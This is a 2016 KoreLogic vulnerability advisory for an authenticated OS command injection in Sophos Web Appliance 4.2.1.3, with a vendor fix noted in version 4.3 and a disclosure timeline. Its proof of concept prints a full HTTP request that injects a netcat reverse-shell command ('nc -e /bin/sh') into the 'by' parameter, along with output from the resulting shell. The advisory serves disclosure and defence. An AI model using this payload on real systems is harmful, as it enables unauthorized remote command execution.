Sophos Web Appliance Remote Code Execution

2016-11-03T00:00:00
ID KL-001-2016-009
Type korelogic
Reporter Matt Bergin (@thatguylevel)
Modified 2016-11-03T00:00:00

Description

Title: Sophos Web Appliance Remote Code Execution Advisory ID: KL-001-2016-009 Publication Date: 2016.11.03 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt

  1. Vulnerability Details

    Affected Vendor: Sophos Affected Product: Web Apppliance Affected Version: v4.2.1.3 Platform: Embedded Linux CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), CWE-88: Argument Injection or Modification Impact: Remote Code Execution Attack vector: HTTP

  2. Vulnerability Description

    An authenticated user of any privilege can execute arbitrary system commands as the non-root webserver user.

  3. Technical Description

    Multiple parameters to the web interface are unsafely handled and can be used to run operating system commands, such as:

    POST /index.php?c=logs HTTP/1.1 Host: [redacted] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/javascript, text/html, application/xml, text/xml, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 305 Connection: close

    STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timelinenc%20-e%20/bin/sh%20[redacted]%209191&search=test&sort=time&multiplier=1&start=&end=&direction=1

    HTTP/1.1 200 OK Date: Tue, 10 May 2016 15:35:05 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 207

    {"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10 4:35 PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}

    --

    The vulnerable parameters are: by, request_id, and txt_filter_domain

    That request launches the following process on the SWA:

    1000 16851 0.0 0.0 2728 1040 ? S 15:43 0:00 sh -c /opt/perl/bin/salp-generate-report.pl --report=Filter --res=- --type=user_timelinenc -e /bin/sh [redacted] 9191 --filter='dGVzdA==' --start='2016/05/10' --end='2016/05/10' --action='' --sid=590fca17b230e8cdba0394cfa28ef2eb

    From the shell launched via netcat:

    id;uname -a;uptime uid=1000(spiderman) gid=1000(spiderman) groups=1000(spiderman),16(cron),44(tproxyd),45(wdx) Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux 15:52:34 up 4:26, 0 users, load average: 0.11, 0.12, 0.15

  4. Mitigation and Remediation Recommendation

    The vendor has issued a fix for this vulnerability in Version 4.3 of SWA. Release notes available at:

    http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html

  5. Credit

    This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

  6. Disclosure Timeline

    2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos 2016.09.14 - Sophos requests KoreLogic re-send vulnerability details. 2016.09.28 - KoreLogic requests status update. 2016.09.28 - Sophos informs KoreLogic that an update including a fix for this vulnerability will be available near the end of October. 2016.10.13 - Sophos informs KoreLogic that the update was released to a limited customer base and is expected to be distributed at-large over the following week. 2016.11.03 - Public disclosure.

  7. Proof of Concept

    See 3. Technical Description.